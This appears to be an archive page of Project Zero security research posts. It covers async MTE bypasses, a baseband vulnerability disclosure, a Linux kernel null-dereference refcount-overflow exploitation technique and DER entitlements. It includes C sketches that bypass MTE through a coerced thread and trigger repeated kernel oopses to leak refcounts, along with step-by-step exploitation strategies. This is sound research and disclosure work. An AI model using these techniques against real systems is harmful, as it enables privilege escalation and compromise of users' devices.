Since SIGSEGV is a catchable signal, any signal handlers that can handle SIGSEGV become a critical attack surface for async MTE bypasses. Breakpad/Crashpad at present have a signal handler (ie, installed in all Chrome processes) which allows a trivial same-thread bypass for async MTE as a security protection, which is demonstrated in async_bypass_signal_handler.c / async_bypass_signal_handler.js.

The concept is simple - if we can corrupt any state that would result in the signal handler concluding that a SIGSEGV coming from a tag-check failure is handled/safe, then we can effectively disable MTE for the process.

If we look at the current breakpad signal handler (the crashpad signal handler has the same design):

void ExceptionHandler::SignalHandler(int sig, siginfo_t* info, void* uc) {
  // Give the first chance handler a chance to recover from this signal
  //
  // This is primarily used by V8. V8 uses guard regions to guarantee memory
  // safety in WebAssembly. This means some signals might be expected if they
  // originate from Wasm code while accessing the guard region. We give V8 the
  // chance to handle and recover from these signals first.
  if (g_first_chance_handler_ != nullptr &&
      g_first_chance_handler_(sig, info, uc)) {
    return;
  }

It's clear that if our exploit could patch g_first_chance_handler_ to point to any function that will return a non-zero value, then this will mean that tag-check failures are no longer caught.

The example we've provided in async_bypass_signal_handler.c and async_bypass_signal_handler.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $ ./async_bypass_signal_handler ./async_bypass_signal_handler.js

offsets: 0x26c068 0x36bc80

starting script execution

access

segv handler 11

Async MTE has been bypassed [0.075927734375ms]

done

It seems hard to imagine designing a signal handler that will be robust against all possible attacks here, as most data that is accessed by the signal handler will now need to be treated as untrusted. It's our understanding that Android is considering making changes to the way that the kernel handles these failures to guarantee delivery of these errors to an out-of-process handler, preventing this kind of bypass.

4. Generic bypass in multi-threaded environments [ASYNC].

Since async MTE failures are only delivered when the thread which caused the error enters the kernel, there's a slightly more involved (but more generic) bypass available in multi-threaded environments. If we can coerce another thread into performing our next exploit steps for us, then we can bypass the protection this way.

The example we've provided in async_bypass_thread.c and async_bypass_thread.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $ ./async_bypass_thread ./async_bypass_thread.js                                                                                      

thread is running

Async MTE bypassed!

Note that in practice, the technique here would most likely be to have the coerced thread simply install a new signal handler, effectively reimplementing technique 3 above, but the example invokes a shell command as a demonstration.
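
A minimal sketch of the coercion idea (hypothetical code, assuming the target process already contains a worker thread, spawned with pthread_create, whose control data the compromised thread can reach):

#include <pthread.h>
#include <signal.h>
#include <stdatomic.h>

static _Atomic int please_disable_mte = 0;

static void swallow_segv(int sig) { (void)sig; /* ignore tag-check faults */ }

// A clean worker thread: it polls shared state and performs syscalls on the
// attacker's behalf (here, reinstalling a permissive SIGSEGV handler).
static void* worker(void* arg) {
  (void)arg;
  for (;;) {
    if (atomic_exchange(&please_disable_mte, 0)) {
      signal(SIGSEGV, swallow_segv);  // kernel entry happens on this thread
    }
  }
  return NULL;
}

// Called from the faulting thread after its invalid accesses: flipping a
// flag in shared memory requires no syscall, so the pending tag-check
// failure is never delivered to it.
static void coerce_worker(void) { atomic_store(&please_disable_mte, 1); }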

How wide are these windows?

So, we've identified two methods by which a compromised thread might avoid the consequences of performing invalid accesses. This was a known and expected limitation of async-MTE-as-a-security-mitigation — but how significant is this?

In the existing (Linux) kernel implementation, an outstanding async-MTE failure is delivered as a SIGSEGV when the thread that performed the faulting access transitions to kernel mode. This means that the user-to-kernel transition can be thought of as a synchronisation barrier for tag-check failures.

This leads us to our first rule for async-MTE-safe exploitation:

  1. We need to complete our exploit (or disable async-MTE) without needing to make a system call from the faulting thread.

This will already pose a significant limitation in some contexts - for example, many network services will have a `read/write` loop in between commands, so this would mean that the exploit must be completed within the execution of a single command. However, for many other contexts, this is less of an issue - a vulnerability in a complex file format parser, decompression algorithm or scripting engine will likely provide sufficient control between system calls to complete an exploit (as demonstrated above with the duktape javascript engine).

There is then a second requirement that the exploit-writer needs to bear in mind, which is the periodic timer interrupt. In the kernel configuration tested, this was set to `CONFIG_HZ_250`, so we can expect a timer interrupt every 4ms, leading us to our second rule [3]:

  2. We need to complete our exploit in ~0.2 ms if we want to get acceptable (95%[4]) reliability. (+0.01ms exploit runtime => -0.25% reliability)
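
To make the arithmetic explicit (a back-of-the-envelope model, assuming a timer tick during the exploit is fatal to it, and that the faulting access occurs at a uniformly random point within the 4ms tick period):

  P(no tick during exploit) ≈ 1 - t_exploit / 4ms

so t_exploit = 0.2ms gives 1 - 0.05 = 95%, and each additional 0.01ms of runtime costs 0.01 / 4 = 0.25% of reliability, matching the figures above.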

Part 2 continues with a higher-level analysis of the effectiveness of various different MTE configurations in a variety of user-space application contexts, and what type of impact we'd expect to see on attacker cost.

[1] It is known/expected that Spectre-type attacks are possible to leak pointer values from memory.

[2] ARM indicated that this should not be the case (this potential weakness was raised with them early in the MTE design process).

[3] This assumes that the attacker can't construct a side-channel allowing them to determine when a timer interrupt has happened in the target process, which seems like a reasonable assumption in a remote media-parsing scenario, but less so in the context of a local privilege elevation.

[4] 95% is a rough estimate - part 2 discusses the reasoning here in more detail; but note that we would consider this a rough reference point for what attackers will likely work towards, and not a hard limit.

Summary: MTE As Implemented

2 August 2023 at 16:30

By Mark Brand, Project Zero

In mid-2022, Project Zero was provided with access to pre-production hardware implementing the ARM MTE specification. This blog post series is based on that review, and includes general conclusions about the effectiveness of MTE as implemented, specifically in the context of preventing the exploitation of memory-safety vulnerabilities.

Despite its limitations, MTE is still by far the most promising path forward for improving C/C++ software security in 2023. The ability of MTE to detect memory corruption exploitation at the first dangerous access provides a significant improvement in diagnostic and potential security effectiveness. In comparison, most other proposed approaches rely on blocking later stages in the exploitation process, for example various hardware-assisted CFI approaches which aim to block invalid control-flow transfers.

No MTE-based mitigation is going to completely solve the problem of exploitable C/C++ memory safety issues. The unfortunate reality of speculative side-channel attacks is that MTE will not end memory corruption exploitation. However, there are no other practical proposals with a similarly broad impact on exploitability (and exploitation cost) of such a wide range of memory corruption issues which would additionally address this limitation.

Furthermore, given the long history of innovation and research in this space, we believe that it is not possible to build a software solution for C/C++ memory safety with comparable coverage to MTE that has less runtime overhead than AddressSanitizer/HWAsan. It's clear that such an overhead is not acceptable for most production workloads.

Products that expect to contain large C/C++ codebases in the long term, and that consider the exploitation of memory corruption vulnerabilities to be a key risk for their product security, should actively drive support for ARM's MTE in their products.

For a more detailed analysis, see the following linked blog posts:

  1. Implementation Testing - An objective summary of the tests performed, and some basic analysis. If you're interested in implementing a mitigation based on MTE, you should read this document first as it will give you more detailed technical background.

  2. Mitigation Case Studies - A subjective assessment of the impact of various mitigation approaches based on the use of MTE in various user-mode contexts, based on our experiences during the tests performed in Part 1. If you're not interested in implementing a mitigation based on MTE, but you are interested in the limits of how effective such a mitigation might be, you can skip Part 1 and start here.
  3. The Kernel - A subjective assessment of the additional issues faced in using MTE for a kernel-mode mitigation.

Release of a Technical Report into Intel Trust Domain Extensions

24 April 2023 at 16:27

Today, members of Google Project Zero and Google Cloud are releasing a report on a security review of Intel's Trust Domain Extensions (TDX). TDX is a feature introduced to support Confidential Computing by providing hardware isolation of virtual machine guests at runtime. This isolation is achieved by securing sensitive resources, such as guest physical memory. This restricts what information is exposed to the hosting environment.

The security review was performed in cooperation with Intel engineers on pre-release source code for version 1.0 of the TDX feature. This code is the basis for the TDX implementation which will be shipping in limited SKUs of the 4th Generation Intel Xeon Scalable CPUs.

The result of the review was the discovery of 10 confirmed security vulnerabilities, which were fixed before the final release of products with the TDX feature. The final report highlights the most interesting of these issues and provides an overview of the feature's architecture. Five additional areas were identified for defense-in-depth changes in subsequent versions of TDX.

You can read more details about the review on the Google Cloud security blog and the final report. If you would like to review the source code yourself, Intel has made it available on the TDX website.

Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems

16 March 2023 at 18:07

Posted by Tim Willis, Project Zero

In late 2022 and early 2023, Project Zero reported eighteen 0-day vulnerabilities in Exynos Modems produced by Samsung Semiconductor. The four most severe of these eighteen vulnerabilities (CVE-2023-24033, CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498) allowed for Internet-to-baseband remote code execution. Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number. With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely.

The fourteen other related vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076 and nine other vulnerabilities that are yet to be assigned CVE-IDs) were not as severe, as they require either a malicious mobile network operator or an attacker with local access to the device.

Affected devices

Samsung Semiconductor's advisories provide the list of Exynos chipsets that are affected by these vulnerabilities. Based on information from public websites that map chipsets to devices, affected products likely include:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series;
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
  • The Pixel 6 and Pixel 7 series of devices from Google; and
  • any vehicles that use the Exynos Auto T5123 chipset.

Patch timelines

We expect that patch timelines will vary per manufacturer (for example, affected Pixel devices have received a fix for all four of the severe Internet-to-baseband remote code execution vulnerabilities in the March 2023 security update). In the meantime, users with affected devices can protect themselves from the baseband remote code execution vulnerabilities mentioned in this post by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, although your ability to change this setting can be dependent on your carrier. As always, we encourage end users to update their devices as soon as possible, to ensure that they are running the latest builds that fix both disclosed and undisclosed security vulnerabilities.

Four vulnerabilities being withheld from disclosure

Under our standard disclosure policy, Project Zero discloses security vulnerabilities to the public a set time after reporting them to a software or hardware vendor. In some rare cases where we have assessed attackers would benefit significantly more than defenders if a vulnerability was disclosed, we have made an exception to our policy and delayed disclosure of that vulnerability.

Due to a very rare combination of the level of access these vulnerabilities provide and the speed with which we believe a reliable operational exploit could be crafted, we have decided to make a policy exception to delay disclosure for the four vulnerabilities that allow for Internet-to-baseband remote code execution. We will continue our history of transparency by publicly sharing disclosure policy exceptions, and will add these issues to that list once they are all disclosed.

Related vulnerabilities not being withheld

Of the remaining fourteen vulnerabilities, we are disclosing four vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074 and CVE-2023-26075) that have exceeded Project Zero's standard 90-day deadline today. These issues have been publicly disclosed in our issue tracker, as they do not meet the high standard to be withheld from disclosure. The remaining ten vulnerabilities in this set have not yet hit their 90-day deadline, but will be publicly disclosed at that point if they are still unfixed.

Changelog

2023-03-21: Removed note at the top of the blog as patches are more widely available for the four severe vulnerabilities. Added additional context that some carriers can control the Wi-Fi calling and VoLTE settings, overriding the ability of some users to change them.

2023-03-20: Google Pixel updated their March 2023 Security Bulletin to now show that all four Internet-to-baseband remote code execution vulnerabilities were fixed for Pixel 6 and Pixel 7 in the March 2023 update, not just one of the vulnerabilities, as originally stated.

2023-03-20: Samsung Semiconductor updated their advisories to include three new CVE-IDs, that correspond to the three other Internet-to-baseband remote code execution issues (CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498). The blogpost text was updated to reflect these new CVE-IDs.

2023-03-17: Samsung Semiconductor updated their advisories to remove Exynos W920 as an affected chipset, so we have removed it from the "Affected devices" section.

2023-03-17: Samsung Mobile advised us that the A21s is the correct affected device, not the A21 as originally stated.

2023-03-17: Four of the fourteen less severe vulnerabilities hit their 90-day deadline at the time of publication, not five, as originally stated.

Exploiting null-dereferences in the Linux kernel

19 January 2023 at 17:33

Posted by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops - instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred - however the intention is to allow kernel bugs to be more easily detected and logged, under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important, however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 2^32 times.
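
As a toy illustration of the wraparound (plain C, nothing kernel-specific - the kernel's overflow-unsafe counter is an atomic_t, but the arithmetic is the same):

#include <stdint.h>
#include <stdio.h>

int main(void) {
  uint32_t refcount = 1;                 // one legitimate reference
  for (uint64_t i = 0; i < (1ull << 32); i++)
    refcount++;                          // 2^32 leaked increments
  printf("refcount = %u\n", refcount);   // prints 1: the leaks have vanished
  return 0;                              // one more "put" now frees a live object
}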

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example - an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)

{

        struct proc_maps_private *priv = m->private;

        struct mem_size_stats mss;

        struct mm_struct *mm;

        struct vm_area_struct *vma;

        unsigned long last_vma_end = 0;

        int ret = 0;

        priv->task = get_proc_task(priv->inode); //task reference taken

        if (!priv->task)

                return -ESRCH;

        mm = priv->mm; //With no vma's, mm->mmap is NULL

        if (!mm || !mmget_not_zero(mm)) { //mm reference taken

                ret = -ESRCH;

                goto out_put_task;

        }

        memset(&mss, 0, sizeof(mss));

        ret = mmap_read_lock_killable(mm); //mmap read lock taken

        if (ret)

                goto out_put_mm;

        hold_task_mempolicy(priv);

        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {

                smap_gather_stats(vma, &mss);

                last_vma_end = vma->vm_end;

        }

        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here

        seq_pad(m, ' ');

        seq_puts(m, "[rollup]\n");

        __show_smap(m, &mss, true);

        release_task_mempolicy(priv);

        mmap_read_unlock(mm);

out_put_mm:

        mmput(mm);

out_put_task:

        put_task_struct(priv->task);

        priv->task = NULL;

        return ret;

}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

Kernel log showing the oops condition backtrace

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself - in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Process B clones another process C with CLONE_VM | CLONE_PTRACE
  4. Process B munmap’s its entire virtual memory address space - this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~2^32 times
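
A minimal sketch of the per-iteration trigger (steps 5 and 6 above; hypothetical code with error handling omitted):

#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

// Open the victim's smaps_rollup in a freshly forked child and read it once.
// The read oopses in show_smaps_rollup and the child dies, leaking one
// mm_users reference; a fresh open is needed every time because the
// seq_file mutex of the previous instance stays locked forever.
static void leak_one_ref(pid_t victim) {
  pid_t child = fork();
  if (child == 0) {
    char path[64];
    char buf[4096];
    snprintf(path, sizeof(path), "/proc/%d/smaps_rollup", victim);
    int fd = open(path, O_RDONLY);
    read(fd, buf, sizeof(buf));  // kernel oops: this child never returns
    _exit(0);
  }
  waitpid(child, NULL, 0);  // reap the dead child, then repeat
}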

The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)

{

        VM_BUG_ON(atomic_read(&mm->mm_users));

        uprobe_clear_state(mm);

        exit_aio(mm);

        ksm_exit(mm);

        khugepaged_exit(mm);

        exit_mmap(mm);

        mm_put_huge_zero_page(mm);

        set_mm_exe_file(mm, NULL);

        if (!list_empty(&mm->mmlist)) {

                spin_lock(&mmlist_lock);

                list_del(&mm->mmlist);

                spin_unlock(&mmlist_lock);

        }

        if (mm->binfmt)

                module_put(mm->binfmt->module);

        lru_gen_del_mm(mm);

        mmdrop(mm);

}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.

Flowchart showing how mmget/mmput on a 0 refcount leads to unsafe concurrent __mmput calls.

This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:

void exit_aio(struct mm_struct *mm)

{

        struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);

        struct ctx_rq_wait wait;

        int i, skipped;

        if (!table)

                return;

        atomic_set(&wait.count, table->nr);

        init_completion(&wait.comp);

        skipped = 0;

        for (i = 0; i < table->nr; ++i) {

                struct kioctx *ctx =

                rcu_dereference_protected(table->table[i], true);

                if (!ctx) {

                        skipped++;

                        continue;

                }

                ctx->mmap_size = 0;

                kill_ioctx(mm, ctx, &wait);

        }

        if (!atomic_sub_and_test(skipped, &wait.count)) {

                /* Wait until all IO for the context are done. */

                wait_for_completion(&wait.comp);

        }

        RCU_INIT_POINTER(mm->ioctx_table, NULL);

        kfree(table);

}

While the callee function kill_ioctx is written in such a way as to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called in a concurrent way), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function, while only being freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio’s internal context freeing loop. Successful exploitation will trigger the following kernel BUG indicating that a double free has occurred:

Kernel backtrace showing the double free condition detection

Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
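
As a rough sketch of the race-widening step mentioned above (hypothetical helper; io_setup is bounded by the system-wide /proc/sys/fs/aio-max-nr limit, so the achievable count may be capped):

#include <linux/aio_abi.h>
#include <sys/syscall.h>
#include <unistd.h>

// Create many aio contexts in the shared mm before triggering the concurrent
// __mmput calls: each context adds work to exit_aio's freeing loop,
// stretching the window between the ioctx_table fetch and its kfree.
static void create_aio_contexts(int count) {
  for (int i = 0; i < count; i++) {
    aio_context_t ctx = 0;
    if (syscall(SYS_io_setup, 128, &ctx) < 0)  // 128 events per context
      break;  // hit the aio-nr limit; proceed with what we have
  }
}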

Conclusion

While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.

DER Entitlements: The (Brief) Return of the Psychic Paper

12 January 2023 at 16:59

Posted by Ivan Fratric, Project Zero

Note: The vulnerability discussed here, CVE-2022-42855, was fixed in iOS 15.7.2 and macOS Monterey 12.6.2. While the vulnerability did not appear to be exploitable on iOS 16 and macOS Ventura, iOS 16.2 and macOS Ventura 13.1 nevertheless shipped hardening changes related to it.

Last year, I spent a lot of time researching the security of applications built on top of XMPP, an instant messaging protocol based on XML. More specifically, my research focused on how subtle quirks in XML parsing can be used to undermine the security of such applications. (If you are interested in learning more about that research, I did a talk on it at Black Hat USA 2022. The slides and the recording can be found here and here).

At some point, when a part of my research was published, people pointed out other examples (unrelated to XMPP) where quirks in XML parsing led to security vulnerabilities. One of those examples was a vulnerability dubbed Psychic Paper, a really neat vulnerability in the way Apple's operating systems check what entitlements an application has.

Entitlements are one of the core security concepts of Apple’s operating systems. As Apple’s documentation explains, “An entitlement is a right or privilege that grants an executable particular capabilities.” For example, an application on an Apple operating system can’t debug another application without possessing proper entitlements, even if those two applications run as the same user. Even applications running as root can’t perform all actions (such as accessing some of the kernel APIs) without appropriate entitlements.

Psychic Paper was a vulnerability in the way entitlements were checked. Entitlements were stored inside the application’s signature blob in the XML format, so naturally the operating system needed to parse those at some point using an XML parser. The problem was that the OS didn’t have a single parser for this, but rather a staggering four parsers that were used in different places in the operating system. One parser was used for the initial check that the application only has permitted entitlements, and a different parser was later used when checking whether the application has an entitlement to perform a specific action.

When giving my talk on XMPP, I gave a challenge to the audience: find me two different XML parsers that always, for every input, produce the same output. That is difficult because XML, although intended to be a simple format, is in reality anything but simple. So it shouldn’t come as a surprise that a way was found for one of Apple's XML parsers to return one set of entitlements and another parser to see a different set of entitlements when parsing the same entitlements blob.

The fix for the Psychic Paper bug was somewhat ironic: the problem arose because Apple had four XML parsers in the OS, and yet the fix was to add a fifth one.

So, after my XMPP research, when I learned about the Psychic Paper bug, I decided to take a look at these XML parsers and see if I could somehow find another way to trigger the bug even after the fix. After playing with various Apple XML parsers, I had an XML snippet I wanted to try out. However, when I actually tried to use it in an application, I discovered that the system for checking entitlements behaved completely differently than I thought. This was because of…

DER Entitlements

According to Apple developer documentation, “Starting in iOS 15, iPadOS 15, tvOS 15, and watchOS 8, the system checks for a new, more secure signature format that uses Distinguished Encoding Rules, or DER, to embed entitlements into your app’s signature”. As another Apple article boldly proclaims, “The future is DER”.

So, what is DER?

Unlike the previous text-based XML format, DER is a binary format, also commonly used in digital certificates. The format is specified in the X.690 standard.

DER follows relatively simple type-length-data encoding rules. An image from the specification illustrates that:

The Identifier field encodes the object type, which can be a primitive (e.g. a string or a boolean), but also a constructed type (an object containing other objects, e.g. an array/sequence). The Length field encodes the number of bytes in the content. The length can be encoded differently depending on the size of the content (e.g. if the content is smaller than 128 bytes, the length field only takes a single byte). The length field is followed by the content itself. In the case of constructed types, the content is also encoded using the same encoding rules.
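
For a concrete feel for the encoding, here is a hand-worked example (standard X.690 DER, not Apple-specific) of a single entitlement key/value sequence, get-task-allow = true, written out as a C byte array:

static const unsigned char kGetTaskAllow[] = {
    0x30, 0x13,        // SEQUENCE, 19 content bytes follow
    0x0C, 0x0E,        // UTF8String, 14 content bytes follow
    'g','e','t','-','t','a','s','k','-','a','l','l','o','w',
    0x01, 0x01, 0xFF,  // BOOLEAN, 1 content byte, true (encoded as 255)
};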

An example from Apple developer documentation shows what DER-encoded entitlements might look like:

appl [ 16 ]       

 INTEGER           :01

 cont [ 16 ]       

  SEQUENCE          

   UTF8STRING        :application-identifier

   UTF8STRING        :SKMME9E2Y8.com.example.apple-samplecode.ProfileExplainer

  SEQUENCE          

   UTF8STRING        :com.apple.developer.team-identifier

   UTF8STRING        :SKMME9E2Y8

  SEQUENCE          

   UTF8STRING        :get-task-allow

   BOOLEAN           :255

  SEQUENCE          

   UTF8STRING        :keychain-access-groups

   SEQUENCE          

    UTF8STRING        :SKMME9E2Y8.*

    UTF8STRING        :com.apple.token

Each individual entitlement is a sequence which has two elements: a key and a value, e.g. “get-task-allow”:boolean(true). All entitlements are also a part of a constructed type (denoted as “cont [ 16 ]” in the listing).

DER is meant to have unique binary representation and replacing XML with DER was very likely motivated, at least in part, by preventing issues such as Psychic Paper. But does it necessarily succeed in that goal?

How entitlements are checked

To understand how entitlements are checked, it is useful to also look at the bigger picture and understand what security/integrity checks Apple operating systems perform on binaries before (and in some cases, while) running them.

Integrity information in Apple binaries is stored in a structure called the Embedded Signature Blob. This structure is a container for various other structures that play a role in integrity checking: the digital signature itself, but also entitlements and an important structure called the Code Directory. The Code Directory contains a hash of every page in the binary (up to the Signature Blob), but also other information, including the hash of the entitlements blob. The hash of the Code Directory is called cdHash and it is used to uniquely identify the binary. For example, it is the cdHash that the digital signature actually signs. Note that since the Code Directory contains a hash of the entitlements blob, any change to the entitlements leads to a different cdHash.

As also noted in the Psychic Paper writeup, there are several ways a binary might be signed:

  • The cdHash of the binary could be in the system’s Trust Cache, which stores the hashes of system binaries.
  • The binary could be signed by the Apple App Store.
  • The binary could be signed by the developer, but in that case it must reference a “Provisioning Profile” signed by Apple.
  • On macOS only, a binary could also be self-signed.

We are mostly interested in the last two cases, because they are the only ones that allow us to provide custom entitlements. However, in those cases, any entitlements a binary has must either be a subset of those allowed by the provisioning profile created by Apple (in the “provisioning profile” case), or consist only of those whitelisted by the OS (in the self-signed case). That is, unless one has a vulnerability like Psychic Paper.

An entrypoint into file integrity checks is the vnode_check_signature function inside the AppleMobileFileIntegrity kernel extension. AppleMobileFileIntegrity is the kernel component of integrity checking, but there is also a userspace daemon, amfid, which AppleMobileFileIntegrity uses to perform certain actions as noted further in the text.

We are not going to analyze the full behavior of vnode_check_signature. However, I will highlight the most important actions and those relevant to understanding DER entitlements workflow:

  • First, vnode_check_signature retrieves the entitlements in the DER format. If the currently loaded binary does not contain DER entitlements and only contains entitlements in the XML format, AppleMobileFileIntegrity calls transmuteEntitlementsInDaemon which uses amfid to convert entitlements from XML into DER format. The conversion itself is done via CFPropertyListCreateWithData (to convert XML to CFDictionary) and CESerializeCFDictionary (which converts CFDictionary to DER representation).

